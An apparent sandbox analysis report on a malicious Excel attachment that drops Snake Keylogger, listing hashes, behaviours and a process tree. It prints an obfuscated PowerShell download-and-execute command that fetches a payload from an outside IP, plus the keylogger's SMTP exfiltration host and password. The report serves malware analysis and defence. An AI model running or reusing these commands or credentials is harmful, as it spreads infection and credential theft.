Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
03-10-2024 07:05
Static task
static1
Behavioral task
behavioral1
Sample
Updated New Order.xls
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Updated New Order.xls
Resource
win10v2004-20240802-en
General
-
Target
Updated New Order.xls
-
Size
938KB
-
MD5
39e2230ab8f6d983bee40367b44d0d99
-
SHA1
92e81d6b42529bd3171b4541ea252fce6ba3c010
-
SHA256
ed0b1f5749e23d2494de9cdeda7aca03c44690e22dfbd2f4b5f96baa73986406
-
SHA512
2d9e2060a4251c50e3d32896d71025fc57c2e588d5cbd88ce0c9ba52287f4e40d4775f528958032f7323c3f02d3a0e9e39872e5427b5ed3e9dbbfcd8234ba90c
-
SSDEEP
12288:UmzHJEjwWYSRD3DERnLRmF8Dl3PT7uZNPK+N4Uu/UbH0ilKLdcoCYd8Eojy1f9w:ncwHSRbARM8B3l+iv/UbUxLdwYLom1V
Malware Config
Extracted
snakekeylogger
Protocol: smtp- Host:
mail.teilecar.com - Port:
587 - Username:
[email protected] - Password:
Manta924porsche=911 - Email To:
[email protected]
Signatures
-
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Snake Keylogger payload 3 IoCs
resource yara_rule behavioral1/memory/2252-64-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger behavioral1/memory/2252-66-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger behavioral1/memory/2252-65-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger -
Blocklisted process makes network request 3 IoCs
flow pid Process 10 2940 mshta.exe 11 2940 mshta.exe 13 1236 powershell.exe -
Downloads MZ/PE file
-
Evasion via Device Credential Deployment 1 IoCs
pid Process 1236 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 764 taskhostw.exe -
Loads dropped DLL 1 IoCs
pid Process 1236 powershell.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 14 checkip.dyndns.org -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x00070000000174f8-56.dat autoit_exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 764 set thread context of 2252 764 taskhostw.exe 40 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 860 2252 WerFault.exe 40 -
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskhostw.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EXCEL.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2448 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 1236 powershell.exe 1236 powershell.exe 1236 powershell.exe 2252 RegSvcs.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 764 taskhostw.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1236 powershell.exe Token: SeDebugPrivilege 2252 RegSvcs.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
pid Process 2448 EXCEL.EXE 2448 EXCEL.EXE 2448 EXCEL.EXE 2448 EXCEL.EXE 2448 EXCEL.EXE 2448 EXCEL.EXE 2448 EXCEL.EXE -
Suspicious use of WriteProcessMemory 32 IoCs
description pid Process procid_target PID 2940 wrote to memory of 2600 2940 mshta.exe 33 PID 2940 wrote to memory of 2600 2940 mshta.exe 33 PID 2940 wrote to memory of 2600 2940 mshta.exe 33 PID 2940 wrote to memory of 2600 2940 mshta.exe 33 PID 2600 wrote to memory of 1236 2600 cmd.exe 35 PID 2600 wrote to memory of 1236 2600 cmd.exe 35 PID 2600 wrote to memory of 1236 2600 cmd.exe 35 PID 2600 wrote to memory of 1236 2600 cmd.exe 35 PID 1236 wrote to memory of 2896 1236 powershell.exe 36 PID 1236 wrote to memory of 2896 1236 powershell.exe 36 PID 1236 wrote to memory of 2896 1236 powershell.exe 36 PID 1236 wrote to memory of 2896 1236 powershell.exe 36 PID 2896 wrote to memory of 2020 2896 csc.exe 37 PID 2896 wrote to memory of 2020 2896 csc.exe 37 PID 2896 wrote to memory of 2020 2896 csc.exe 37 PID 2896 wrote to memory of 2020 2896 csc.exe 37 PID 1236 wrote to memory of 764 1236 powershell.exe 39 PID 1236 wrote to memory of 764 1236 powershell.exe 39 PID 1236 wrote to memory of 764 1236 powershell.exe 39 PID 1236 wrote to memory of 764 1236 powershell.exe 39 PID 764 wrote to memory of 2252 764 taskhostw.exe 40 PID 764 wrote to memory of 2252 764 taskhostw.exe 40 PID 764 wrote to memory of 2252 764 taskhostw.exe 40 PID 764 wrote to memory of 2252 764 taskhostw.exe 40 PID 764 wrote to memory of 2252 764 taskhostw.exe 40 PID 764 wrote to memory of 2252 764 taskhostw.exe 40 PID 764 wrote to memory of 2252 764 taskhostw.exe 40 PID 764 wrote to memory of 2252 764 taskhostw.exe 40 PID 2252 wrote to memory of 860 2252 RegSvcs.exe 41 PID 2252 wrote to memory of 860 2252 RegSvcs.exe 41 PID 2252 wrote to memory of 860 2252 RegSvcs.exe 41 PID 2252 wrote to memory of 860 2252 RegSvcs.exe 41
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Updated New Order.xls"1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2448
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe -Embedding1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2940 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/c PoweRsHElL -EX bYpASs -nOp -W 1 -C DEvICECReDENTiaLDEPlOyMENt.eXE ; IEX($(IEx('[sySTEM.TEXt.enCoding]'+[cHaR]0X3a+[cHAR]58+'UTF8.GetsTRiNG([SyStem.ConVERt]'+[CHaR]58+[cHaR]0x3A+'FrOMBaSE64STriNG('+[cHAr]34+'JGo0Wk9GICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbWJFckRlZmluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdsdm1vRndaWSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqc2tJd2FtLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNoYmNnUUd5c1gsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxYVSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHYWp0R0RieE5qKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiblhjTm5QandrIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFa21xICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRqNFpPRjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvMjMwL3Rhc2tob3N0dy5leGUiLCIkZU5WOkFQUERBVEFcdGFza2hvc3R3LmV4ZSIsMCwwKTtzVGFSVC1TTEVlUCgzKTtzdGFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcdGFza2hvc3R3LmV4ZSI='+[CHAr]0X22+'))')))"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2600 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePoweRsHElL -EX bYpASs -nOp -W 1 -C DEvICECReDENTiaLDEPlOyMENt.eXE ; IEX($(IEx('[sySTEM.TEXt.enCoding]'+[cHaR]0X3a+[cHAR]58+'UTF8.GetsTRiNG([SyStem.ConVERt]'+[CHaR]58+[cHaR]0x3A+'FrOMBaSE64STriNG('+[cHAr]34+'JGo0Wk9GICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbWJFckRlZmluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdsdm1vRndaWSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqc2tJd2FtLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNoYmNnUUd5c1gsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxYVSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHYWp0R0RieE5qKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiblhjTm5QandrIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFa21xICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRqNFpPRjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvMjMwL3Rhc2tob3N0dy5leGUiLCIkZU5WOkFQUERBVEFcdGFza2hvc3R3LmV4ZSIsMCwwKTtzVGFSVC1TTEVlUCgzKTtzdGFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcdGFza2hvc3R3LmV4ZSI='+[CHAr]0X22+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1236 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\caxr7pxz.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2896 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF9AB.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCF9AA.tmp"5⤵
- System Location Discovery: System Language Discovery
PID:2020
-
-
-
C:\Users\Admin\AppData\Roaming\taskhostw.exe"C:\Users\Admin\AppData\Roaming\taskhostw.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:764 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Users\Admin\AppData\Roaming\taskhostw.exe"5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2252 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2252 -s 9726⤵
- Program crash
PID:860
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD57fb5fa1534dcf77f2125b2403b30a0ee
SHA1365d96812a69ac0a4611ea4b70a3f306576cc3ea
SHA25633a39e9ec2133230533a686ec43760026e014a3828c703707acbc150fe40fd6f
SHA512a9279fd60505a1bfeef6fb07834cad0fd5be02fd405573fc1a5f59b991e9f88f5e81c32fe910f69bdc6585e71f02559895149eaf49c25b8ff955459fd60c0d2e
-
Filesize
436B
MD5971c514f84bba0785f80aa1c23edfd79
SHA1732acea710a87530c6b08ecdf32a110d254a54c8
SHA256f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895
SHA51243dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12
Filesize174B
MD554ca68d809cb8adad2a9242c59fa8eaf
SHA15d48fdbf1ae68ee331f880a648ff8c53a63e37fb
SHA256a5e041550661e0fd630b518935823714c7e1848ac288df6d89676cdc36b019d5
SHA512a5640df02e0c9fa5c8d328af868e5e21b23c3dba6fad35534ca2dbbc39d5d2b23ff9ccbf20da22fbce5a230f6de2359f99a4d88e47273e3b5f0a4efa643b492f
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8
Filesize170B
MD5f8a2e6894a0dcbdb98fca45c6da99f8a
SHA169bb01d078646e56655f927bd1946d2daf701523
SHA25620d4b7bfb3581435cfef9d2be6b86abde51c13b90ee7bc44ede1dd53df78ee97
SHA512a0b714321becd6ee6c7d5dafbe7ba46e2bacae7b18eaea96e3ff73b77adcb68ce4c31fe24e394731efc524569e4c15452cd8a64c39288f329f574ef72ebebf3d
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\K3VL8XEP\Ienetbooksweetupdation[1].hta
Filesize8KB
MD5e8b6b8f66f1568524c963ee107abf9c7
SHA1aaf3e605b150c22d8431ffcfc30bae044ea201c7
SHA2564eed8d0dfe860288fff6017d8b43c5e3c7d73a4df00d467ee2f9e778b7e197d0
SHA512544008c3d03e014df07d4b31dba48d1fd6d822993bd8b8167ec2ebe43f739f8fc31fb1a512777e19da9dd55557a03515143c5caa3274a2e2e8c505d166dad9ee
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
1KB
MD5c9d2586ae9a924facd708c411124cf85
SHA1033f9fe195f639c4af916919362a038055879681
SHA256931e6117870095066415c1bedbeeb6b8418181064cf2179dc38183a40384f8ee
SHA5124109e1ae1b3b26af8618abcc68f63c7339883782d44f4bae4162eedde4f95b900aba5e13829739ea4ae435d5ddce41f416030df873fd82d5f01fd4a6387b9f1e
-
Filesize
3KB
MD59a00e3236a6f8ecbf0dc06f5f6e20dbd
SHA1b6e98a473521e9a0c4e783e7bca5f9060e57357a
SHA256aab8f399ca2cf5685f732b33fbb8406057ee1659a2bba2f35b01243ebb899e2c
SHA5123a8f238f7ca97be67b488f7e39430343aecf71a942880e597e3f4f2e7492f42e9c42691d475a5124e93a71760d6182f781eb027894ab3a96394333f82b9de210
-
Filesize
7KB
MD587548d27877bd8648c8a03cc6afcf70c
SHA13385e1633e0bd0ad5294ab151b05f300d9421b64
SHA256accc2e85c2ec0c66f44f31ede48e377a2ba4c50785743493a2e5fefcff836195
SHA51225a11a16853b32656acb53e99abbffe1a263a98af958e9e0fe2726eee4cba7da1016e037878234f1c938b561c28b5f07747fba89595ae6b9377664113b942ad3
-
Filesize
934KB
MD5d515411b9a3c0d9fb13b9c6a928a7fd0
SHA1f940a7302ac76567c15efb1a15d789b42224aac3
SHA2567b2fcffe77e320517c511f5a3700d8545712475aeb4dc04088537fa8456fec77
SHA512447a5ab235672a2d067e5792260aa5b978720f8d67ac80bd875e74d7032cb496e3b0463f3c3870bd87d975cddf7f750df35a9ea7aa8aa65f1bd1590d3305c9d6
-
Filesize
652B
MD568c519368bfe105d6194635030048be5
SHA16535ceb2ee756fd53d9e8ca00f9dcf4342e06040
SHA256facca162718c6f2760b0e68ab27ed3904e8412a20b3b3ecb4f97c41eb139d6e2
SHA512db46d6bb49063502e33f91bcfa571aa6803d0e9f84a9dae497bc46fe86a18651200d3b38ebd34c3ed98846203d1a01550963c23af26ab3c8aa30fa411e721086
-
Filesize
489B
MD566cd8bc31e61e003cddb2ea81c47016a
SHA1b9172635caecd693d1476d08c9cecb5777ea49bb
SHA2560ce2cb15b914d1becfba7f1eed7a96e44610e5b70a8d4a9568ed117d6c3a73dd
SHA5126dd379fff538ecec3814b2bf5ffb2d3e8d1f5e8da9f79b416cd2ac81b916633122565cb9ce89f3bcbb1acb1da0269ae2977fdd515f74f9ffc8dbcae15a0a15e4
-
Filesize
309B
MD5cb9983d894d6163bc95550599bec3b09
SHA1108fdbaf27f3f74afb272c7bed41fdf2e1353f05
SHA256454daf1d94418a46c03d6fd4dc5bec70d9aab748c97adedaf841fe4f5bc24f98
SHA51263053dd6fe4884bedc4ac685f100c669ebe4fa432616d1c78770f5c3a441207524898488af4522c09fad37ffc24382e749c8116dafe62b22e4db97be4dbae38f